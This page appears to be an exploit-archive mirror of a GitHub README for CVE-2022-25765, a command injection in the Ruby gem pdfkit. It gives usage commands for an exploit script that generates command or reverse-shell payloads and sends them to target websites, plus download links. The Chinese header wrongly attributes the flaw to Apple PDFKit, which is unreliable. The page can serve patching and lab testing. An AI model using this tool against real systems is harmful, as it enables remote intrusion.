Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-25765 PoC — Apple PDFKit 安全漏洞

Source
https://github.com/UNICORDev/exploit-CVE-2022-25765
Associated Vulnerability
Title:Apple PDFKit 安全漏洞 (CVE-2022-25765)
Description:Apple PDFKit是美国苹果(Apple)公司的其中的一个PDF文档生成组件。 Apple PDFKit 存在安全漏洞,攻击者可利用该漏洞执行非法命令。
Description
Exploit for CVE-2022–25765 (pdfkit) - Command Injection
Readme
# Exploit for CVE-2022–25765 (pdfkit) - Command Injection

![GitHub CVE Cover](https://user-images.githubusercontent.com/23003787/219503380-083bd0fc-80e0-4d99-8f38-06c065aaa2d0.png)

**Like this repo? Give us a ⭐!**

*For educational and authorized security research purposes only.*

## Exploit Author

[@UNICORDev](https://unicord.dev) by ([@NicPWNs](https://github.com/NicPWNs) and [@Dev-Yeoj](https://github.com/Dev-Yeoj))

## Vulnerability Description

The package pdfkit from 0.0.0 are vulnerable to Command Injection where the URL is not properly sanitized.

## Exploit Description

A ruby gem `pdfkit` is commonly used for converting websites or HTML to PDF documents. Vulnerable versions (< 0.8.7.2) of this software can be passed a specially crafted URL containing a command that will be executed. This exploit generates executable URLs or sends them to a vulnerable website running `pdfkit`.

## Usage

```bash
  python3 exploit-CVE-2022–25765.py -c <command>
  python3 exploit-CVE-2022–25765.py -s <local-IP> <local-port>
  python3 exploit-CVE-2022–25765.py -c <command> [-w <http://target.com/index.html> -p <parameter>]
  python3 exploit-CVE-2022–25765.py -s <local-IP> <local-port> [-w <http://target.com/index.html> -p <parameter>]
  python3 exploit-CVE-2022–25765.py -h
```

## Options

```
  -c    Custom command mode. Provide command to generate custom payload with.
  -s    Reverse shell mode. Provide local IP and port to generate reverse shell payload with.
  -w    URL of website running vulnerable pdfkit. (Optional)
  -p    POST parameter on website running vulnerable pdfkit. (Optional)
  -h    Show this help menu.
```

## Download

[Download exploit-CVE-2022-25765.py from GitHub](https://raw.githubusercontent.com/UNICORDev/exploit-CVE-2022-25765/main/exploit-CVE-2022-25765.py)

[Download exploit-CVE-2022-25765.py from ExploitDB](https://www.exploit-db.com/exploits/51293)

### Searchsploit (ExploitDB)

```bash
searchsploit -u
searchsploit -m 51293
```

## Exploit Requirements

- python3
- python3:requests
- python3:urllib3

## Demo

### Custom Command Mode

![cropped command](https://user-images.githubusercontent.com/23003787/221307314-3af99159-2768-4195-b51b-8279cc436a35.gif)

### Reverse Shell Sent to Target Website Mode

![exploit-CVE-2022–25765](https://user-images.githubusercontent.com/23003787/221304847-8d5cafaa-246a-432c-9301-f21271f6d607.gif)

## Tested On

pdfkit Version 0.8.6

## Applies To

pdfkit Versions < 0.8.7.2

## Test Environment

```bash
gem install pdfkit -v 0.8.6
```

## Credits

- https://nvd.nist.gov/vuln/detail/CVE-2022-25765
- https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795
- https://app.hackthebox.com/machines/Precious
- https://www.exploit-db.com/exploits/51293
File Snapshot

 [4.0K]  /data/pocs/1d4acaeb4c6114bbd0884a5ffb96c31385441550
├── [ 241]  Dockerfile
├── [7.7K]  exploit-CVE-2022-25765.py
├── [2.7K]  README.md
└── [ 153]  requirements.txt

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.